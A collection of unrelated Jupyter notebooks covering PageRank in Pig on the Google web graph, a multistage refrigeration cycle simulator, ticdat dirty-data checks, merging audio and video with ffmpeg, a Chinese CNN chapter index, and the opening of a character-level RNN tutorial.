# %blob_up DataTEST.txt /$PSEUDO/Data/DataTEST.txt
# On vérifie que les données ont bien été chargées:
# %blob_ls /$PSEUDO/Data/
# ### Récupération de données réelles
# On fait de même avec les données réelles : [Google web graph](http://snap.stanford.edu/data/web-Google.html)
pyensae.download_data("web-Google.txt.gz", url="http://snap.stanford.edu/data/")
# %head web-Google.txt
# On filtre les premières lignes.
with open("web-Google.txt", "r") as f:
with open("DataGoogle.txt", "w") as g:
for line in f:
if not line.startswith("#"):
g.write(line)
# %head DataGoogle.txt
# %blob_up DataGoogle.txt /$PSEUDO/Data/DataGoogle.txt
# %blob_ls /$PSEUDO/Data/
# ### Algorithme Page Rank
# **Initialisation de la table**
# +
# %%PIG Creation_Graph.pig
Arcs = LOAD '$CONTAINER/$PSEUDO/Data/$path'
USING PigStorage('\t')
AS (frm:int,to:int);
GrSort = GROUP Arcs BY frm;
deg_sort = FOREACH GrSort
GENERATE COUNT(Arcs) AS degs, Arcs , group AS ID;
GrEntr = GROUP Arcs BY to;
GrFin= JOIN deg_sort BY ID,
GrEntr BY group;
N = FOREACH (group GrSort ALL)
GENERATE COUNT(GrSort);
Pr = FOREACH GrFin
GENERATE deg_sort::ID AS ID , (float) 1 / (float)N.$0 AS PageRank;
PageRank = JOIN GrFin BY deg_sort::ID,
Pr BY ID;
STORE PageRank
INTO '$CONTAINER/$PSEUDO/Projet/SortTest.txt'
USING PigStorage('\t') ;
# -
client.pig_submit(bs,
client.account_name,
"Creation_Graph.pig",
params=dict(path="DataTEST.txt"),
stop_on_failure=True)
# st = %hd_job_status job_1435385350894_0001
st["id"],st["percentComplete"],st["status"]["jobComplete"]
# %tail_stderr job_1435385350894_0001 10
# **Itérations**
# On crée une macro pour répéter les iterations.
# +
# %%PIG iteration.pig
gr = LOAD '$CONTAINER/$PSEUDO/Projet/SortTest.txt'
USING PigStorage('\t')
AS (DegS:long,Asort:{(frm: int,to: int)},Noeud:int,Noeud2:int,Aent:{(frm: int,to: int)},ID: int,PageRank: float);
Arcs = LOAD '$CONTAINER/$PSEUDO/Data/DataTEST.txt'
USING PigStorage('\t')
AS (frm:int,to:int);
Graph = FOREACH gr
GENERATE Noeud , DegS, PageRank AS Pinit, PageRank, PageRank/ (float) DegS AS Ratio;
DEFINE my_macro(G,A,ALP) RETURNS S {
Gi= FOREACH $G GENERATE Noeud , Ratio;
GrEntr = JOIN $A BY frm , Gi BY Noeud ;
Te = GROUP GrEntr BY to;
so = FOREACH Te GENERATE SUM(GrEntr.Ratio) AS Pr, group AS ID;
tu = JOIN $G BY Noeud, so BY ID;
sort = FOREACH tu GENERATE Noeud , DegS, Pinit, $ALP*Pinit+(1-$ALP)*Pr AS PageRank;
$S = FOREACH sort GENERATE Noeud , DegS, Pinit, PageRank, PageRank/ (float) DegS AS Ratio;
}
Ite1 = my_macro(Graph,Arcs,$alpha);
Ite2 = my_macro(Ite1,Arcs,$alpha);
Ite3 = my_macro(Ite2,Arcs,$alpha);
Ite4 = my_macro(Ite3,Arcs,$alpha);
Ite5 = my_macro(Ite4,Arcs,$alpha);
Ite6 = my_macro(Ite5,Arcs,$alpha);
Ite7 = my_macro(Ite6,Arcs,$alpha);
Ite8 = my_macro(Ite7,Arcs,$alpha);
Dump Ite1;
dump Ite8;
# -
jid = client.pig_submit(bs,
client.account_name,
"iteration.pig",
params=dict(alpha="0"),
stop_on_failure=True )
jid
# st = %hd_job_status job_1435385350894_0006
st["id"],st["percentComplete"],st["status"]["jobComplete"]
# %tail_stderr job_1435385350894_0006 20
# On peut alors s'intéresser aux vraies données !
# ### Avec les données Google
# **initialisation**
# +
# %%PIG Creation_Graph2.pig
Arcs = LOAD '$CONTAINER/$PSEUDO/Data/$path'
USING PigStorage('\t')
AS (frm:int,to:int);
GrSort = GROUP Arcs BY frm;
deg_sort = FOREACH GrSort
GENERATE COUNT(Arcs) AS degs, Arcs , group AS ID;
GrEntr = GROUP Arcs BY to;
GrFin = JOIN deg_sort BY ID,
GrEntr BY group;
N = FOREACH (GROUP GrSort ALL)
GENERATE COUNT(GrSort);
Pr = FOREACH GrFin
GENERATE deg_sort::ID AS ID , (float) 1 / (float)N.$0 AS PageRank;
PageRank = JOIN GrFin BY deg_sort::ID, Pr BY ID;
STORE PageRank
INTO '$CONTAINER/$PSEUDO/Projet/SortGoogle.txt'
USING PigStorage('\t') ;
# -
client.pig_submit(bs, client.account_name, "Creation_Graph2.pig", params=dict(path="DataGoogle.txt"), stop_on_failure=True )
# st = %hd_job_status job_1435385350894_0037
st["id"],st["percentComplete"],st["status"]["jobComplete"]
# %tail_stderr job_1435385350894_0037 20
# +
# %%PIG iteration2.pig
gr = LOAD '$CONTAINER/$PSEUDO/Projet/SortGoogle.txt'
USING PigStorage('\t')
AS (DegS:long,Asort:{(frm: int,to: int)},Noeud:int,Noeud2:int,Aent:{(frm: int,to: int)},ID: int,PageRank: float);
Arcs = LOAD '$CONTAINER/$PSEUDO/Data/DataGoogle.txt'
USING PigStorage('\t')
AS (frm:int,to:int);
Graph = FOREACH gr
GENERATE Noeud , DegS, PageRank AS Pinit, PageRank, PageRank/ (float) DegS AS Ratio;
DEFINE my_macro(G,A,ALP) RETURNS S {
Gi= FOREACH $G GENERATE Noeud , Ratio;
GrEntr = JOIN $A by frm , Gi by Noeud ;
Te = GROUP GrEntr by to;
so = FOREACH Te generate SUM(GrEntr.Ratio) AS Pr, group AS ID;
tu = JOIN $G by Noeud, so by ID;
sort = FOREACH tu GENERATE Noeud , DegS, Pinit, $ALP*Pinit+(1-$ALP)*Pr AS PageRank;
$S = FOREACH sort GENERATE Noeud , DegS, Pinit, PageRank, PageRank/ (float) DegS AS Ratio;
}
Ite1 = my_macro(Graph,Arcs,$alpha);
Ite2 = my_macro(Ite1,Arcs,$alpha);
Ite3 = my_macro(Ite2,Arcs,$alpha);
Ite4 = my_macro(Ite3,Arcs,$alpha);
Ite5 = my_macro(Ite4,Arcs,$alpha);
Ite6 = my_macro(Ite5,Arcs,$alpha);
Ite7 = my_macro(Ite6,Arcs,$alpha);
Ite8 = my_macro(Ite7,Arcs,$alpha);
Dump Ite1;
dump Ite8;
STORE Ite8 INTO '$CONTAINER/$PSEUDO/Projet/PageRank.txt' USING PigStorage('\t') ;
# -
client.pig_submit(bs,
client.account_name,
"iteration2.pig",
params=dict(alpha="0.5"),
stop_on_failure=True )
# st = %hd_job_status job_1435385350894_0042
st["id"],st["percentComplete"],st["status"]["jobComplete"]
# %tail_stderr job_1435385350894_0042 20
# %blob_downmerge /$PSEUDO/Projet/PageRank.txt PageRank.txt
# +
import pandas
import matplotlib as plt
plt.style.use('ggplot')
df = pandas.read_csv("PageRank.txt", sep="\t",names=["Node","OutDeg","Pinit", "PageRank", "k"])
df
df['PageRank'].hist(bins=100, range=(0,0.000005))
# -
df.sort_values("PageRank",ascending=False).head()
# %blob_close
|
_unittests/ut_helpgen/data_gallery/notebooks/notebook_eleves/2014_2015/2015_page_rank.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Multistage Compression Refrigeration Cycle
#
# * SimVCCE Branch :B2023-2
# ## 1 The Two-stage Compression Refrigeration Cycle
#
# ><NAME>, <NAME>, Thermodynamics: An Engineering Approach, 8th Edition,McGraw-Hill, 2015
# >
# >EXAMPLE 11–4: Multistage Compression Refrigeration: Page627-628
#
# **EXAMPLE 11–5 Two-Stage Refrigeration Cycle with a Flash Chamber,Page627-628**
#
# Consider a two-stage compression refrigeration system operating between the pressure limits of 0.8 and 0.14 MPa.
#
# 
#
# The working fluid is R134a.
#
# The refrigerant leaves the condenser as a saturated liquid and is throttled to a flash chamber operating at 0.32 MPa.
#
# Part of the refrigerant evaporates during this flashing process, and this vapor is mixed with the refrigerant leaving the low-pressure compressor.
#
# The mixture is then compressed to the condenser pressure by the high-pressure compressor.
#
# The liquid in the flash chamber is throttled to the evaporator pressure and cools the refrigerated space as it vaporizes in the evaporator.
#
# Assuming the refrigerant leaves the evaporator as a saturated vapor and both compressors are isentropic,
#
# **Determine**
#
# * (a) the fraction of the refrigerant that evaporates as it is throttled to the flash chamber,
# * (b) the amount of heat removed from the refrigerated space and the compressor work per unit mass of refrigerant flowing through the condenser, and
# * (c) the coefficient of performance.
#
# ## 2 The Analysis
#
# ### 2.1 The New Device Classes
#
# * Flash Chamber
#
# * Mixing Chamber
# #### 2.1.1 Flash Chamber
# +
# # %load ../../SimVCCE/vccpython/components/flashchamber.py
"""
class FlashChamber
↓ iPort
┌─────┴─────┐
│ │
│ │→ oPortV
│────────── │
└─────┬─────┘
↓ oPortL
json example:
{
"name": "flashchamber",
"devtype": "FLASH_CHAMBER",
"iPort": {
"p": 0.6
},
"oPortL": {
"x": 0.0
},
"oPortV": { "x": 1.0
}
},
"""
from components.port import Port
class FlashChamber:
energy = "none"
devtype = "FLASH_CHAMBER"
def __init__(self, dictDev):
"""
Initializes lashChamber
"""
self.name = dictDev['name']
self.iPort = Port(dictDev['iPort'])
self.oPortV = Port(dictDev['oPortV'])
self.oPortL = Port(dictDev['oPortL'])
def state(self):
if self.iPort.p is not None:
self.oPortV.p = self.iPort.p
self.oPortL.p = self.oPortL.p
elif self.oPortL.p is not None:
self.oPortV.p = self.oPortV.p
self.iPort.p = self.iPort.p
elif self.oPortV.p is not None:
self.oPortL.p = self.oPortL.p
self.iPort.p = self.iPort.p
def balance(self):
"""flash chamber """
oPortV_fdot =self.iPort.x
oPortL_fdot =1.0-self.iPort.x
self.oPortV.mdot = self.iPort.mdot*oPortV_fdot
self.oPortL.mdot = self.iPort.mdot*oPortL_fdot
def __str__(self):
result = '\n' + self.name
result += '\n' + " PORT " + Port.title
result += '\n' + " iPort "+self.iPort.__str__()
result += '\n' + " oPortV " + self.oPortV.__str__()
result += '\n' + " oPortL " + self.oPortL.__str__()
return result
# -
# #### 2.1.2 Mixing Chamber
# +
# # %load ../../SimVCCE/vccpython/components/mixingchamber.py
"""
MixingChamber
↑ oPort
┌─────┴─────┐
│ │
→ │ │
iPort0 │ │
└─────┬─────┘
↑ iPort1
json example:
{
"name": "mixingchamber",
"devtype": "MIXING_CHAMBER",
"iPort0": {
"x": 1.0
},
"iPort1": {
},
"oPort": {
"p": 0.6
}
}
"""
from components.port import Port
class MixingChamber:
energy = "none"
devtype = "MIXING_CHAMBER"
def __init__(self, dictDev):
"""
Initializes Merge_Two2one
"""
self.name = dictDev['name']
self.iPort0 = Port(dictDev['iPort0'])
self.iPort1 = Port(dictDev['iPort1'])
self.oPort = Port(dictDev['oPort'])
def state(self):
if self.iPort0.p is not None:
self.oPort.p = self.iPort0.p
self.iPort1.p = self.iPort0.p
elif self.iPort1.p is not None:
self.iPort0.p = self.iPort1.p
self.oPort.p = self.iPort1.p
elif self.oPort.p is not None:
self.iPort0.p = self.oPort1.p
self.iPort1.p = self.oPort1.p
def balance(self):
self.oPort.mdot = self.iPort0.mdot+self.iPort1.mdot
self.oPort.h = (self.iPort0.mdot*self.iPort0.h +
self.iPort1.mdot*self.iPort1.h)/self.oPort.mdot
def __str__(self):
result = '\n' + self.name
result += '\n' + " PORT " + Port.title
result += '\n' + " iPort0 "+self.iPort0.__str__()
result += '\n' + " iPort1 " + self.iPort1.__str__()
result += '\n' + " oPort " + self.oPort.__str__()
return result
# -
# #### 2.1.3 `__init__.py`
#
#
# +
# # %load ../../SimVCCE/vccpython/components/__init__.py
"""
General Object-oriented Abstraction of VC Cycle
Components Package : port and devices
Author: <NAME> <EMAIL>
"""
from .compressor import Compressor
from .condenser import Condenser
from .expansionvalve import ExpansionValve
from .evaporator import Evaporator
# add the new device class
from .flashchamber import FlashChamber
from .mixingchamber import MixingChamber
# ------------------------------------------------------------------------------
# compdict
# typedev: class
# Note: add typedev: class to the dict after you add the new device class
# --------------------------------------------------------------------------------
compdict = {
Compressor.devtype: Compressor,
Condenser.devtype: Condenser,
ExpansionValve.devtype: ExpansionValve,
Evaporator.devtype: Evaporator,
# add the new device class
FlashChamber.devtype: FlashChamber,
MixingChamber.devtype: MixingChamber
}
# -
# ### 2.2 The Modified Sequential-modular Approach
#
# * Branch 2023-2
#
# **Sequential-modular approach(SM 序贯模块法):**
#
# * Process **units** are solved in <b style="color:blue">sequence</b>
#
# ```python
# def __component_simulator(self):
# # 2 the ports state of device
# for key in self.comps:
# self.comps[key].state()
#
# # 3 the nodes state of connectors
# for item in self.conns.nodes:
# if item.stateok == False:
# item.state()
# # 4 comps[key].balance()
# for curdev in self.comps:
# self.comps[curdev].balance()
#
# ```
# ---
# But,there are **dependencies** of the **mass** float rate and **port's state** calculation.
#
# For example: The **Mixing Chamber** in a two-stage compression refrigeration cycle
#
# * The **fraction** of the refrigerant is not known from **Flash Chamber**
#
# * The **inlet refrigerant state** from **low-pressure compressor** is not known
#
# then,
#
# * the outlet refrigerant state of the **mixing chamber** is not known
#
# * the outlet refrigerant state **high-pressure compressor** is not known
#
# 
#
# If we do **not** have the **mass flow rate** or **port's states** of the device, t
#
# **The simple sequence may be failed!**
#
#
# In the example, we provide one general method to deal with the mass flow rate and port's state fails
#
# ```python
# def __component_simulator(self):
# state_nodes = self.conns.nodes.copy()
#
# keys = list(self.comps.keys())
# deviceok = False
# CountsDev = len(self.comps)
# i = 0 # i: the count of deviceok to avoid endless loop
# while (deviceok == False and i <= CountsDev):
# for curdev in keys:
# try:
# # step 2: the port state: thermal process
# self.comps[curdev].state()
#
# # step 3 the port state: new port's parameter pairs
# for port in state_nodes:
# if port.stateok == False:
# port.state()
# if port.state() == True:
# state_nodes.remove(port)
#
# # step 4: the port state :the energy and mass balance
# self.comps[curdev].balance()
# keys.remove(curdev)
# except:
# pass
#
# i += 1
# if (len(keys) == 0):
# deviceok = True
#
# if len(keys) > 0:
# print(keys) # for debug
#
# ```
# +
# # %load ../../SimVCCE/vccpython/vcc/vccobj.py
"""
General Object-oriented Abstraction of VC Cycle
class VCCycle: the Simulator class of VC Cycle
Author: <NAME> <EMAIL>
"""
from time import time, localtime, strftime
from getpass import getuser
from components import compdict
from components.port import Port
from .connector import Connector
class VCCycle:
def __init__(self, dictcycle):
"""
dictcycle={"name":namestring,
"refrigerant":refrigerantstring,
"components":[{component1},{component2},...],
"connectors":{"name1.port1":"name2.port2",...}
}
TO:
self.comps : dict of all component objects
self.conns : the connector object
"""
self.name = dictcycle["name"]
self.cycle_refrigerant = dictcycle["refrigerant"]
Port.cycle_refrigerant = self.cycle_refrigerant
# 1 convert dict to the dict of device objects: {device name:device obiect}
self.comps = {}
for curdev in dictcycle["components"]:
self.comps[curdev['name']] = compdict[curdev['devtype']](curdev)
# 2 set the nodes value and alias between the item of nodes and the port of devices
self.conns = Connector(dictcycle["connectors"], self.comps)
def __component_simulator(self):
state_nodes = self.conns.nodes.copy()
keys = list(self.comps.keys())
deviceok = False
CountsDev = len(self.comps)
i = 0 # i: the count of deviceok to avoid endless loop
while (deviceok == False and i <= CountsDev):
for curdev in keys:
try:
# step 2: the port state: thermal process
self.comps[curdev].state()
# step 3 the port state: new port's parameter pairs
for port in state_nodes:
if port.stateok == False:
port.state()
if port.state() == True:
state_nodes.remove(port)
# step 4: the port state :the energy and mass balance
self.comps[curdev].balance()
keys.remove(curdev)
except:
pass
i += 1
if (len(keys) == 0):
deviceok = True
if len(keys) > 0:
print(keys) # for debug
def simulator(self):
self.__component_simulator()
self.Wc = 0.0
self.Qin = 0.0
self.Qout = 0.0
for key in self.comps:
if self.comps[key].energy == "CompressionWork":
self.Wc += self.comps[key].Wc
elif self.comps[key].energy == "QIN":
self.Qin += self.comps[key].Qin
elif self.comps[key].energy == "QOUT":
self.Qout += self.comps[key].Qout
self.cop = self.Qin / self.Wc
self.cop_hp = self.Qout / self.Wc
def __str__(self):
curtime = strftime("%Y/%m/%d %H:%M:%S", localtime(time()))
result = f"\nThe Vapor-Compression Cycle: {self.name} ({curtime} by {getuser()})\n"
result += f"\nRefrigerant: {self.cycle_refrigerant}\n"
rusult_items = {'Compression Work(kW): ': self.Wc,
'Refrigeration Capacity(kW): ': self.Qin,
'\tCapacity(ton): ': self.Qin*60*(1/211),
'The heat transfer rate(kW): ': self.Qout,
'The coefficient of performance: ': self.cop,
'The coefficient of performance(heat pump):': self.cop_hp}
for name, value in rusult_items.items():
result += f'{name:>35} {value:{">5.2f" if type(value) is float else ""}}\n'
return result
# -
#
# ### 2.3 The JOSN of Cycles
#
# # %load ../../SimVCCE/vccpython/jsonmodel/vcr_two_stage_11_5.json
{
"name": "The_TWO_STAGE_11_5",
"refrigerant": "R134a",
"components": [
{
"name": "Compressor_HP",
"devtype": "COMPRESSOR",
"iPort": {
"p": 0.32,
"mdot": 1.0
},
"oPort": {
"p": 0.8
},
"ef": 1.0
},
{
"name": "Compressor_LP",
"devtype": "COMPRESSOR",
"iPort": {
"p": 0.14
},
"oPort": {
"p": 0.32
},
"ef": 1.0
},
{
"name": "ExpansionValve1",
"devtype": "EXPANSIONVALVE",
"iPort": {
"p": 0.8,
"x": 0.0
},
"oPort": {
"p": 0.32
}
},
{
"name": "ExpansionValve2",
"devtype": "EXPANSIONVALVE",
"iPort": {
"p": 0.32
},
"oPort": {}
},
{
"name": "Condenser",
"devtype": "CONDENSER",
"iPort": {
"p": 0.8
},
"oPort": {
"p": 0.8,
"x": 0.0
}
},
{
"name": "Flash_Chamber",
"devtype": "FLASH_CHAMBER",
"iPort": {
"p": 0.32
},
"oPortL": {
"p": 0.32,
"x": 0.0
},
"oPortV": {
"p": 0.32,
"x": 1.0
}
},
{
"name": "Evaporator",
"devtype": "EVAPORATOR",
"iPort": {},
"oPort": {
"p": 0.14,
"x": 1.0
}
},
{
"name": "Mixing_Chamber",
"devtype": "MIXING_CHAMBER",
"iPort0": {
"p": 0.32,
"x": 1
},
"iPort1": {
"p": 0.32
},
"oPort": {
"p": 0.32
}
}
],
"connectors": {
"Compressor_HP.oPort": "Condenser.iPort",
"Condenser.oPort": "ExpansionValve1.iPort",
"ExpansionValve1.oPort": "Flash_Chamber.iPort",
"Flash_Chamber.oPortV": "Mixing_Chamber.iPort0",
"Flash_Chamber.oPortL": "ExpansionValve2.iPort",
"ExpansionValve2.oPort": "Evaporator.iPort",
"Evaporator.oPort": "Compressor_LP.iPort",
"Compressor_LP.oPort": "Mixing_Chamber.iPort1",
"Mixing_Chamber.oPort": "Compressor_HP.iPort"
}
}
# ### 2.4 The Main Application
#
# * vccapp_json.py
#
# +
# # %load ../../SimVCCE/vccpython/vccapp_json.py
"""
General Object-oriented Abstraction of VC Cycle
<NAME>, <NAME>, Thermodynamics: An Engineering Approach, 8th Edition,McGraw-Hill, 2015.
The Simulator of VC Cycle
* Input :the json file of the cycle model
* Output: text file
Run:
python vccapp_json.py
Author: <NAME> <EMAIL>
"""
import json
import os
import glob
from vcc.vccobj import VCCycle
from vcc.utils import OutFiles
if __name__ == "__main__":
curpath = os.path.abspath(os.path.dirname(__file__))
ResultFilePath = curpath+'/result/'
json_filenames_str = curpath+'\\'+'./jsonmodel/*.json'
json_filenames = glob.glob(json_filenames_str)
for i in range(len(json_filenames)):
with open(json_filenames[i], 'r') as f:
thedictcycle = json.loads(f.read())
# the simulator
cycle = VCCycle(thedictcycle)
cycle.simulator()
# output to console
OutFiles(cycle)
# output to the file
ResultFileName = ResultFilePath+thedictcycle['name']
OutFiles(cycle, ResultFileName + '.txt')
# -
# !python ../../SimVCCE/vccpython/vccapp_json.py
# ## 3 glob- Unix style pathname pattern expansion
#
# * https://docs.python.org/3/library/glob.html
#
# The `glob` module finds all the **pathnames** matching a specified **pattern** according to the rules used by the Unix shell,
#
# **pattern**: *
import glob
glob.glob('./Unit4*.ipynb')
# patter:[2-4]
glob.glob('./Unit4-[2-4]-*.ipynb')
# **patter:** ?
#
glob.glob('./Unit4-?-RefrigerationCycle*.ipynb')
|
notebook/Unit4-6-RefrigerationCycle_Multistage.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Addressing dirty data with ticdat
#
# Dirty data is an unloved and often overlooked challenge when building analytical models. A typical assumption is that the input data to a model will somehow magically be clean. In reality, there are any number of reasons why dirty data might be passed as input to your engine. The data might be munged together from different systems, the requirements of your data model might be poorly understood, or a user might be simply pushing your model to its limits via what-if analysis. Regardless of the cause, a professional engine will respond gracefully when passed input data that violates basic integrity checks.
#
# `ticdat` allows for a data scientist to define data integrity checks for 4 different categories of problems (in addition to checking for the correct table and field names).
# 1. Duplicate rows (i.e. duplicate primary key entries in the same table).
# 1. Data type failures. This checks each column for correct data type, legal ranges for numeric data, acceptable flagging strings, nulls present only for columns that allow null, etc.
# 1. Foreign key failures, which check that each record of a child table can cross-reference into the appropriate parent table.
# 1. Data predicate failures. This checks each row for conditions more complex than the data type failure checks. For example, a maximum column can not be allowed to be smaller than the minimum column.
#
# For a `ticdat` app deployed on Enframe, there will be a dedicated subsection of the input tables dedicated to diagnosing data integrity problems. This subsection is populated whenever an app is solved. There is also an integrity "Action" that can be launched to look for data integrity problems independently of the solve process.
#
# For a data scientist working offline, `ticdat` provides bulk-query routines that can be used from within a notebook. We briefly tour these routines below. Please consult the docstrings for more information regarding their utility.
import ticdat
from diet import input_schema
# First, we quickly check that the csv files in `diet_sample_data` represent clean data. The `ticdat` bulk query routines all return "falsey" results on clean data sets.
dat = input_schema.csv.create_tic_dat("diet_sample_data")
any (_ for _ in [input_schema.csv.find_duplicates("diet_sample_data"),
input_schema.find_data_type_failures(dat),
input_schema.find_foreign_key_failures(dat),
input_schema.find_data_row_failures(dat)])
# Next, we examine the `diet_dirty_sample_data` data set, which has been deliberately seeded with dirty data.
#
# We first check for duplicate rows. Note that since the dict-of-dict format that `TicDat` uses will remove any row duplications when representing a data set in memory, we must check for duplications on the csv files directly. Similar duplication checking routines are provided for all the `TicDatFactory` readers.
input_schema.csv.find_duplicates("diet_dirty_sample_data")
# `ticdat` is telling us that there are two different records in the Nutrition Quantities table defining the amount of fat in milk. This can be easily confirmed by manually inspecting the "nutrition_quantities.csv" file in the "diet_dirty_sample_data" directory. In a real-world data set, manual inspection would be impossible and such a duplication would be easily overlooked.
dat = input_schema.csv.create_tic_dat("diet_dirty_sample_data")
input_schema.find_data_type_failures(dat)
{tuple(k): v.pks for k, v in input_schema.find_data_type_failures(dat).items()}
# `ticdat` is telling us that there are two rows which have bad values in the Quantity field of the Nutrition Quantities table. In both cases, the problem is an empty data cell where a number is expected. The rows with this problem are those which specify the quantity for `('macaroni', 'calories')` and `('chicken', 'fat')`. As before, these two errant rows can easily be double checked by manually examining "nutrition_quantities.csv".
input_schema.find_foreign_key_failures(dat, verbosity="Low")
# Here, `ticdat` is telling us that there are 4 records in the Nutrition Quantities table that fail to cross reference with the Foods table. In all 4 cases, it is specifically the "pizza" string in the Food field that fails to find a match from the Name field of the Foods table. If you manually examine "foods.csv", you can see this problem arose because of the Foods table was altered to have a "pizza pie" entry instead of a "pizza" entry.
input_schema.find_data_row_failures(dat)
# Here, `ticdat` is telling us that the "Min Max Check" (i.e. the check that `row["Max Nutrition"] >= row["Min Nutrition"]`) failed for the "fat" record of the Categories table. This is easily verified by manual inspection of "categories.csv".
|
examples/gurobipy/diet/ticdat_and_dirty_data.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import imageio
import cv2
import subprocess
import librosa
import soundfile as sf
import sys
import os
# load frames
frames = []
for i in range(120):
frames.append(imageio.imread("input_photos/you_me_and_ever.jpg"))
# write video no audio
out_video_path = 'output_video/test_video_only.avi'
writer = imageio.get_writer(out_video_path, fps=30)
for f in frames:
writer.append_data(f)
writer.close()
# write audio file
out_audio_path = 'output_video/test_audio_only.wav'
data, sr = librosa.load('audio/disclosure.wav', offset=90.0, duration=4.0)
sf.write(out_audio_path, data, sr)
# +
# combine with ffmpeg
in_audio = "'" + os.getcwd() + r"\output_video\test_audio_only.wav'"
in_video = "'" + os.getcwd() + r"\output_video\test_video_only.avi'"
out_path = "'" + os.getcwd() + r"\output_video\test_audio_video.avi'"
# in_audio = r"'output_video\test_audio_only.wav'"
# in_video = r"'output_video\test_video_only.avi'"
# out_path = r"'output_video\test_audio_video.avi'"
# in_audio = os.getcwd() + r"\output_video\test_audio_only.wav"
# in_video = os.getcwd() + r"\output_video\test_video_only.avi"
# out_path = os.getcwd() + r"\output_video\test_audio_video.avi"
command = 'ffmpeg -i ' + in_video + ' -i ' + in_audio + ' -c copy -map 0:v:0 -map 1:a:0 ' + out_path
print(command)
print(command.split())
subprocess.call(command, shell=True)
# -
os.getcwd()
|
prototype/test_movie_write.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# ---
# + [markdown] origin_pos=0
# # 卷积神经网络
# :label:`chap_cnn`
#
# 在前面的章节中,我们遇到过图像数据。
# 这种数据的每个样本都由一个二维像素网格组成,
# 每个像素可能是一个或者多个数值,取决于是黑白还是彩色图像。
# 到目前为止,我们处理这类结构丰富的数据的方式还不够有效。
# 我们仅仅通过将图像数据展平成一维向量而忽略了每个图像的空间结构信息,再将数据送入一个全连接的多层感知机中。
# 因为这些网络特征元素的顺序是不变的,因此最优的结果是利用先验知识,即利用相近像素之间的相互关联性,从图像数据中学习得到有效的模型。
#
# 本章介绍的*卷积神经网络*(convolutional neural network,CNN)是一类强大的、为处理图像数据而设计的神经网络。
# 基于卷积神经网络架构的模型在计算机视觉领域中已经占主导地位,当今几乎所有的图像识别、目标检测或语义分割相关的学术竞赛和商业应用都以这种方法为基础。
#
# 现代卷积神经网络的设计得益于生物学、群论和一系列的补充实验。
# 卷积神经网络需要的参数少于全连接架构的网络,而且卷积也很容易用GPU并行计算。
# 因此卷积神经网络除了能够高效地采样从而获得精确的模型,还能够高效地计算。
# 久而久之,从业人员越来越多地使用卷积神经网络。即使在通常使用循环神经网络的一维序列结构任务上(例如音频、文本和时间序列分析),卷积神经网络也越来越受欢迎。
# 通过对卷积神经网络一些巧妙的调整,也使它们在图结构数据和推荐系统中发挥作用。
#
# 在本章的开始,我们将介绍构成所有卷积网络主干的基本元素。
# 这包括卷积层本身、填充(padding)和步幅(stride)的基本细节、用于在相邻区域汇聚信息的汇聚层(pooling)、在每一层中多通道(channel)的使用,以及有关现代卷积网络架构的仔细讨论。
# 在本章的最后,我们将介绍一个完整的、可运行的LeNet模型:这是第一个成功应用的卷积神经网络,比现代深度学习兴起时间还要早。
# 在下一章中,我们将深入研究一些流行的、相对较新的卷积神经网络架构的完整实现,这些网络架构涵盖了现代从业者通常使用的大多数经典技术。
#
# :begin_tab:toc
# - [why-conv](why-conv.ipynb)
# - [conv-layer](conv-layer.ipynb)
# - [padding-and-strides](padding-and-strides.ipynb)
# - [channels](channels.ipynb)
# - [pooling](pooling.ipynb)
# - [lenet](lenet.ipynb)
# :end_tab:
#
|
submodules/resource/d2l-zh/tensorflow/chapter_convolutional-neural-networks/index.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# # <NAME>
#
# In this notebook, I'll build a character-wise RNN trained on <NAME>, one of my all-time favorite books. It'll be able to generate new text based on the text from the book.
#
# This network is based off of <NAME>'s [post on RNNs](http://karpathy.github.io/2015/05/21/rnn-effectiveness/) and [implementation in Torch](https://github.com/karpathy/char-rnn). Also, some information [here at r2rt](http://r2rt.com/recurrent-neural-networks-in-tensorflow-ii.html) and from [<NAME>](https://github.com/sherjilozair/char-rnn-tensorflow) on GitHub. Below is the general architecture of the character-wise RNN.
#
# <img src="assets/charseq.jpeg" width="500">
# +
import time
from collections import namedtuple
import numpy as np
import tensorflow as tf
# -
# First we'll load the text file and convert it into integers for our network to use. Here I'm creating a couple dictionaries to convert the characters to and from integers. Encoding the characters as integers makes it easier to use as input in the network.
with open('anna.txt', 'r') as f:
text=f.read()
vocab = sorted(set(text))
vocab_to_int = {c: i for i, c in enumerate(vocab)}
int_to_vocab = dict(enumerate(vocab))
encoded = np.array([vocab_to_int[c] for c in text], dtype=np.int32)
# Let's check out the first 100 characters, make sure everything is peachy. According to the [American Book Review](http://americanbookreview.org/100bestlines.asp), this is the 6th best first line of a book ever.
text[:100]
# And we can see the characters encoded as integers.
encoded[:100]
# Since the network is working with individual characters, it's similar to a classification problem in which we are trying to predict the next character from the previous text. Here's how many 'classes' our network has to pick from.
len(vocab)
# ## Making training mini-batches
#
# Here is where we'll make our mini-batches for training. Remember that we want our batches to be multiple sequences of some desired number of sequence steps. Considering a simple example, our batches would look like this:
#
# <img src="assets/sequence_batching@1x.png" width=500px>
#
#
# <br>
#
# We start with our text encoded as integers in one long array in `encoded`. Let's create a function that will give us an iterator for our batches. I like using [generator functions](https://jeffknupp.com/blog/2013/04/07/improve-your-python-yield-and-generators-explained/) to do this. Then we can pass `encoded` into this function and get our batch generator.
#
# The first thing we need to do is discard some of the text so we only have completely full batches. Each batch contains $N \times M$ characters, where $N$ is the batch size (the number of sequences) and $M$ is the number of steps. Then, to get the total number of batches, $K$, we can make from the array `arr`, you divide the length of `arr` by the number of characters per batch. Once you know the number of batches, you can get the total number of characters to keep from `arr`, $N * M * K$.
#
